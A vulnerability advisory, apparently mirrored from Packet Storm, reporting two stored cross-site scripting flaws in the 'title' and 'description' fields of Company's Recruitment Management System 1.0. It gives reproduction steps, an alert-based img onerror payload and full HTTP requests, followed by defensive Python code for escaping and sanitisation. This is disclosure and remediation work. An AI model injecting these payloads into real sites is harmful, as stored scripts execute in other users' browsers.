Company's Recruitment Management System 1.0 Cross Site Scripting

18 Oct 2021 00:00:00 | Reported by Aniket Deshmane | Type: packetstorm | Source: packetstormsecurity.com | 307 views

Company's Recruitment Management System 1.0 XSS vulnerabilities

Code
`# Exploit Title: Company's Recruitment Management System 1.0. - 'title' Stored Cross-Site Scripting (XSS)  
# Date: 17-10-2021  
# Exploit Author: Aniket Deshmane  
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip  
# Version: 1  
# Tested on: Windows 10,XAMPP  
  
Steps to Reproduce:  
1) Navigate to http://127.0.0.1/employment_application & log in with a staff account.  
2) Navigate to the Vacancies tab.  
3) Click on Add new.  
4) Add the payload  
"><img src=x onerror=alert(1)>  
  
in the Vacancy Title field.  
  
5) Click on Save and you are done. It's gonna be triggered when anyone  
visits the application.  
  
Request:-  
  
POST /employment_application/Actions.php?a=save_vacancy HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data;  
boundary=---------------------------15502044322641666722659366422  
Content-Length: 931  
Origin: http://127.0.0.1  
DNT: 1  
Connection: close  
Cookie: PHPSESSID=e00mbu2u5cojpsh5jkaj9pjlfc  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Cache-Control: no-transform  
  
-----------------------------15502044322641666722659366422  
Content-Disposition: form-data; name="id"  
  
  
-----------------------------15502044322641666722659366422  
Content-Disposition: form-data; name="title"  
  
"><img src=x onerror=alert(1)>  
-----------------------------15502044322641666722659366422  
Content-Disposition: form-data; name="designation_id"  
  
1  
-----------------------------15502044322641666722659366422  
Content-Disposition: form-data; name="slots"  
  
1  
-----------------------------15502044322641666722659366422  
Content-Disposition: form-data; name="status"  
  
1  
-----------------------------15502044322641666722659366422  
Content-Disposition: form-data; name="description"  
  
  
-----------------------------15502044322641666722659366422  
Content-Disposition: form-data; name="files"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------15502044322641666722659366422--  
  
  
  
---------------------  
  
# Exploit Title: Company's Recruitment Management System 1.0 - 'description' Stored Cross-Site Scripting (XSS)  
# Date: 18-10-2021  
# Exploit Author: Aniket Anil Deshmane  
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip  
# Version: 1  
# Tested on: Windows 10,XAMPP  
  
Steps to reproduce:  
1) Log in with a staff account & navigate to the Vacancies tab.  
  
2) Click on add new vacancies. Put any random information in the other fields except description & go to the description window.  
  
3) In the description field, select insert link.  
  
5) In the Text to display field, add the following payload.  
  
"><img src=x onerror=alert(1)>  
  
6) Click on save & you are done. It's gonna be triggered when someone opens  
the vacancy details.  
  
Request:-  
  
POST /employment_application/Actions.php?a=save_vacancy HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0)  
Gecko/20100101 Firefox/93.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data;  
boundary=---------------------------156186133432167175201476666002  
Content-Length: 1012  
Origin: http://127.0.0.1  
DNT: 1  
Connection: close  
Referer: http://127.0.0.1/employment_application/admin/?page=vacancies  
Cookie: PHPSESSID=ah0lpri38n5c4ke3idhbkaabfa  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
  
-----------------------------156186133432167175201476666002  
Content-Disposition: form-data; name="id"  
  
  
-----------------------------156186133432167175201476666002  
Content-Disposition: form-data; name="title"  
  
Test1ee  
-----------------------------156186133432167175201476666002  
Content-Disposition: form-data; name="designation_id"  
  
4  
-----------------------------156186133432167175201476666002  
Content-Disposition: form-data; name="slots"  
  
1  
-----------------------------156186133432167175201476666002  
Content-Disposition: form-data; name="status"  
  
1  
-----------------------------156186133432167175201476666002  
Content-Disposition: form-data; name="description"  
  
<p><br><a href="http://google.com" target="_blank">"><img src="x"  
onerror="alert(1)"></a></p>  
-----------------------------156186133432167175201476666002  
Content-Disposition: form-data; name="files"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------156186133432167175201476666002--  
`
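
Both findings come down to stored values being written into the page as markup. The sketch below is an added example, not code from the application or the advisory: it shows the two output-side fixes, encoding for the plain-text `title` and an allowlist rebuild for the rich-text `description`. It is written in Python as a language-neutral illustration (the application itself is PHP); the function names and the allowlist policy are assumptions.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed policy for the rich-text description: tag -> attributes it may keep.
ALLOWED = {"p": set(), "br": set(), "b": set(), "i": set(), "u": set(),
           "ul": set(), "ol": set(), "li": set(), "a": {"href", "target"}}
VOID = {"br"}  # allowed tags that take no closing tag

def render_title(title: str) -> str:
    """Plain-text field: encode at output so markup is shown, not parsed."""
    return html.escape(title, quote=True)

def _http_url(value: str) -> bool:
    """True only for absolute http(s) URLs; javascript:, data: etc. fail."""
    try:
        return urlsplit(value.strip()).scheme in ("http", "https")
    except ValueError:
        return False

class _Allowlist(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            return  # <img>, <script>, ... vanish along with their attributes
        kept = ""
        for name, value in attrs:
            if name not in ALLOWED[tag] or value is None:
                continue  # onerror=, onclick=, style=, ... are never copied
            if name == "href" and not _http_url(value):
                continue
            kept += f' {name}="{html.escape(value, quote=True)}"'
        self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED and tag not in VOID:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=True))  # text stays text

def sanitize_description(fragment: str) -> str:
    """Rebuild the fragment from allowlisted tags and attributes only."""
    parser = _Allowlist()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)
```

Applied to the two stored values from the requests above, the title comes back as inert text and the description keeps its link but loses the `<img>` element and its `onerror` handler.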

Vulners AI Score: 7.4 (High risk)